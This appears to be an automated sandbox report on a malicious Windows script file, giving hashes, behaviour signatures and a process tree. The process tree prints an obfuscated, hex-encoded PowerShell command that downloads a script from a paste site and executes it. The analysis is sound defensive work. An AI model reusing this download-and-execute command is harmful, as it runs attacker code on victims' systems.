Analysis

  • max time kernel
    122s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/09/2024, 01:39

General

  • Target

    New_Document-660103764860.wsf

  • Size

    5KB

  • MD5

    6cf21f8e5a003e06d32715305b173201

  • SHA1

    06f47d69ed314b69adcfd337478d23493a399b45

  • SHA256

    78fa2e585c744aea0995fffd1e0916baebf76d383235f90b0415df4301f0dd10

  • SHA512

    f1dd798f700a065e82907eb6fd3231a109ef152e3655e5371e427c32a6b8c18957dd7bc0df56ef19f613ab7a969104b4c447b9f2060e1855c698474c5bccb6dc

  • SSDEEP

    96:Tos4XrHTYi6l03P/hyUMl2N6SMxV3xzjpevg50yGFgV9xVf:cs+r/0I3HM06SwfzjpevgeyGFmnd

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New_Document-660103764860.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = [STRINg]::jOIn('' , ( ( 24,52 ,'3d', 27, 49 , 65, 58 ,28, '4e' ,65 ,27,'3b', 24 , 52,45 , 20, '3d' ,20, 24 ,52,'2b' ,27 ,57, '2d' ,'4f' , 42 ,'4a',27 ,'3b',24 , 52, 45 ,44 ,20 ,'3d' ,20,24 ,52, 45,'2b',27 ,65,43, 54 , 20 , '4e' , 65 ,54 ,'2e' , 57,27,'3b',24, 50,41,43 , '3d' ,27 , 65 , 42 , 43 , '4c',27,'3b' , 24 , 78 ,78 ,20,'3d',20 ,24,50 ,41 ,43,'2b' , 27 ,49 , 65, '4e' , 27 , '3b',24, 52, '4f' , 20,'3d' , 20 ,24, 78, 78 ,'2b' ,27,54 , 29 ,'2e', 44, '4f' , 57, '4e','4c','4f',27, '3b' ,24,'7a', '7a', '3d' ,27 ,'4f' ,40,30, 28 , 26, 28 ,27 , 27,68 , 74 ,74 ,70 ,73, '3a','2f' , '2f',70,61,73,74 ,65, '2e' ,65 ,65,'2f',72, '2f',79, 45, 55 , '4d',51,'2f' , 30,27,27 ,29 ,27 , '2e', 52,65,50 , '4c' ,41 , 43, 65, 28 ,27,'4f', 40 , 30, 28, 26 , 27,'2c' ,27 , 41, 44,53 , 54 ,52, 49 ,'4e' ,47,27,29 ,'3b' , 69,65,78,28, 24 ,52 ,45 , 44, '2b' , 24 ,52 , '4f','2b', 24,'7a' ,'7a',29 ) |foREAcH-Object{( [CONVeRT]::ToiNt16(([sTrING]$_ ),16) -AS[CHaR])})) |& ( $ShEllid[1]+$SheLLID[13]+'x') ; powershell $ReDrO"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2192

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    19a2aa637845ab7800c5c0c7d502c0d9

    SHA1

    0c88f71c41d9233b6a37de7acce2cfb2d40d05dc

    SHA256

    df8ae3ea035b74a44661dcfcf1c9fe9118b1eba2d93c59cbee059db046b20b79

    SHA512

    dfc030161742d845a49c664c08200038bc87f7d0702707921d24973ba574546489f9b85afed1208a51573f29874ae69034462fe81462cb4a3a1ffff1377dcf02

  • memory/1044-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

    Filesize

    4KB

  • memory/1044-6-0x00000000023A0000-0x00000000023A8000-memory.dmp

    Filesize

    32KB

  • memory/1044-5-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1044-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1044-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1044-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1044-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1044-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1044-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1044-13-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

    Filesize

    4KB